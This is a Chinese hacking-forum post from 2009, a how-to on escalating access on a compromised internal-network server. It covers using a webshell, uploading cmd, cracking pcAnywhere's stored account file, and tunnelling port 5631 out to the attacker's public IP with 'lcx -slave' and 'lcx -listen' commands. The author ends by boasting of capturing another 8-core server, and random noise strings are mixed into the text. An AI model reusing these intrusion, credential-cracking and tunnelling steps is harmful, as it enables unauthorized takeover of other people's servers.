|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。; Q" y& k) G' R) s9 ?8 m/ O
6 `5 h4 e9 @8 A3 y提权方法:pcanywhere+LCX
5 h+ W0 p1 U" a# C% N& P
9 H! [$ X/ I) v; S k3 N, b获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
+ C2 [* M: V1 k4 f6 ]- O! W9 D. Q2 x+ u% [
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。% t, U4 h7 c$ _ ` E% v
3 u# d- K) \5 W" } t
T0 z" J: G; G查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
2 c. S0 g: j8 p3 G8 z8 I, ?/ j& o; n; s/ q+ h& g P# M ~
f- B: {3 @% P% H1 d
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
6 f; J! `9 B J; s0 J$ S7 e2 }3 q3 |/ H& q( L. X' V
0 A) e* [5 Q7 K
4 Y K4 P2 n$ M/ g/ {2 ^) P d2 {; X. W! r- |* a2 p
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``$ X1 h2 Y* \5 L, p8 P- ? k
2 K* o* G0 A- `" F- |+ p
% n+ ], s+ U8 w2 j/ V* v$ }LCX的用法再简单说下:1 f" d6 |3 L* T/ }' U+ j
* n: g4 ]7 j1 c& n- ?服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)1 e2 G4 B; f x3 ^3 f
& d' m! P+ ^' M: Z2 v, M. j# n4 c本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)" v$ Y: p( H6 v% L7 k
' S' q% x& E3 {- K3 Q/ M% s1 c由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
( |) ^3 n, @9 p; `2 l5 X8 t顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
0 A1 K1 U& O) `* r1 i8 i
$ }/ w( A* G# L) R9 L0 A f1 O" H4 u
4 k; `+ ?' w: u- j' L, E4 D$ u- n1 n8 \/ f9 e7 W. w1 s3 K& F
: K2 ]- W ]1 j+ S# C
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。3 F% [: H" k: |0 W* M( s
7 ?* o" ^6 P) ?
1 |( w ?6 y0 j: v' f: C; U; x3 x9 ?( G
y' O. `" g7 E1 I7 j我们本地连接试试,输入我们刚破解的账号密码1 T! Q. s' W# G, k+ U+ b% k6 m
9 a" d/ @4 |8 c0 K
% c( Z& A3 x2 Z呵呵``连接成功,服务器不错,又一个8核^︵^8 s, X- A% ?, e3 B
- u& B4 l# \: g
" X0 Z( m# S0 m- I7 O9 w0 u
& ~* H+ O+ `( k. _. w5 u; I |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
